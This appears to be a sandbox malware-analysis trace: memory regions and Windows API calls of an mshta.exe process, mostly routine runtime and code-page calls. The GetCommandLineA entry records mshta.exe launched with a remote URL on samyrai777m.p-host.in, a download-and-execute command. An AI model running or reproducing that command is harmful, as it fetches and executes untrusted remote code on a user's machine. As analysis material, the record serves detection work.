filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 1239
start_va = 0x7fee06d0000
end_va = 0x7fee0703fff
entry_point = 0x7fee06d0000
region_type = mapped_file
name = "scrrun.dll"
filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll")
Region:
id = 1248
start_va = 0x2000000
end_va = 0x2013fff
entry_point = 0x2001070
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx")
Region:
id = 1249
start_va = 0x2020000
end_va = 0x202ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002020000"
filename = ""
Region:
id = 1267
start_va = 0x3a50000
end_va = 0x3b4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003a50000"
filename = ""
Region:
id = 1268
start_va = 0x7fefc4e0000
end_va = 0x7fefc60bfff
entry_point = 0x7fefc4e94bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1269
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 1270
start_va = 0x1e50000
end_va = 0x1e51fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e50000"
filename = ""
Region:
id = 1271
start_va = 0x2030000
end_va = 0x2033fff
entry_point = 0x2030000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1272
start_va = 0x2720000
end_va = 0x273efff
entry_point = 0x2720000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db")
Region:
id = 1273
start_va = 0x2740000
end_va = 0x2740fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002740000"
filename = ""
Region:
id = 1274
start_va = 0x2750000
end_va = 0x277ffff
entry_point = 0x2750000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db")
Region:
id = 1275
start_va = 0x2780000
end_va = 0x2783fff
entry_point = 0x2780000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1276
start_va = 0x2f60000
end_va = 0x2fc5fff
entry_point = 0x2f60000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1277
start_va = 0x3b50000
end_va = 0x3c4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003b50000"
filename = ""
Region:
id = 1278
start_va = 0x7fefd9b0000
end_va = 0x7fefd9c9fff
entry_point = 0x7fefd9b1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1279
start_va = 0x7fefda40000
end_va = 0x7fefda75fff
entry_point = 0x7fefda41474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1280
start_va = 0x7fefdb70000
end_va = 0x7fefdd46fff
entry_point = 0x7fefdb71010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1357
start_va = 0x39f0000
end_va = 0x3abffff
entry_point = 0x0
region_type = private
name = "private_0x00000000039f0000"
filename = ""
Region:
id = 1358
start_va = 0x3c50000
end_va = 0x457ffff
entry_point = 0x3c50000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Thread:
id = 34
os_tid = 0xbcc
[0063.000] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fb90 | out: lpSystemTimeAsFileTime=0x14fb90*(dwLowDateTime=0xd59f2af0, dwHighDateTime=0x1d34cee))
[0063.000] GetCurrentProcessId () returned 0xbc8
[0063.000] GetCurrentThreadId () returned 0xbcc
[0063.000] GetTickCount () returned 0x1f140
[0063.000] QueryPerformanceCounter (in: lpPerformanceCount=0x14fb98 | out: lpPerformanceCount=0x14fb98*=479003663) returned 1
[0063.004] GetModuleHandleW (lpModuleName=0x0) returned 0xff9d0000
[0063.004] GetStartupInfoW (in: lpStartupInfo=0x14fa10 | out: lpStartupInfo=0x14fa10*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0063.004] GetVersionExW (in: lpVersionInformation=0x14fa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14fa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0063.004] HeapSetInformation (HeapHandle=0x630000, HeapInformationClass=0x0, HeapInformation=0x14f9e0, HeapInformationLength=0x4) returned 1
[0063.006] HeapSetInformation (HeapHandle=0x630000, HeapInformationClass=0x0, HeapInformation=0x14f9e0, HeapInformationLength=0x4) returned 1
[0063.006] GetStartupInfoW (in: lpStartupInfo=0x14f950 | out: lpStartupInfo=0x14f950*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xff9d0000, hStdOutput=0xff9d4214, hStdError=0x634ba0))
[0063.006] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
[0063.006] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
[0063.006] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
[0063.006] SetHandleCount (uNumber=0x20) returned 0x20
[0063.006] GetCommandLineA () returned="\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0"
[0063.006] GetEnvironmentStringsW () returned 0x2e7430*
[0063.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1386, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1386
[0063.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1386, lpMultiByteStr=0x635590, cbMultiByte=1386, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1386
[0063.006] FreeEnvironmentStringsW (penv=0x2e7430) returned 1
[0063.006] GetLastError () returned 0x0
[0063.006] SetLastError (dwErrCode=0x0)
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] GetACP () returned 0x4e4
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f8e0 | out: lpCPInfo=0x14f8e0) returned 1
[0063.007] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f380 | out: lpCPInfo=0x14f380) returned 1
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3a0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0063.007] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3a0, cbMultiByte=256, lpWideCharStr=0x14f080, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䖻젒䳮") returned 256
[0063.007] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䖻젒䳮", cchSrc=256, lpCharType=0x14f6a0 | out: lpCharType=0x14f6a0) returned 1
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3a0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0063.007] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3a0, cbMultiByte=256, lpWideCharStr=0x14f020, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256
[0063.007] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0063.007] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ee10, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256
[0063.007] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f4a0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¯\x01", lpUsedDefaultChar=0x0) returned 256
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3a0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0063.007] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3a0, cbMultiByte=256, lpWideCharStr=0x14f020, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256
[0063.007] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0063.007] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ee10, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256
[0063.007] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f5a0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256
[0063.007] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xff9da700, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] GetLastError () returned 0x0
[0063.007] SetLastError (dwErrCode=0x0)
[0063.007] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.008] SetLastError (dwErrCode=0x0)
[0063.008] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
[0063.009] SetLastError (dwErrCode=0x0)
[0063.009] GetLastError () returned 0x0
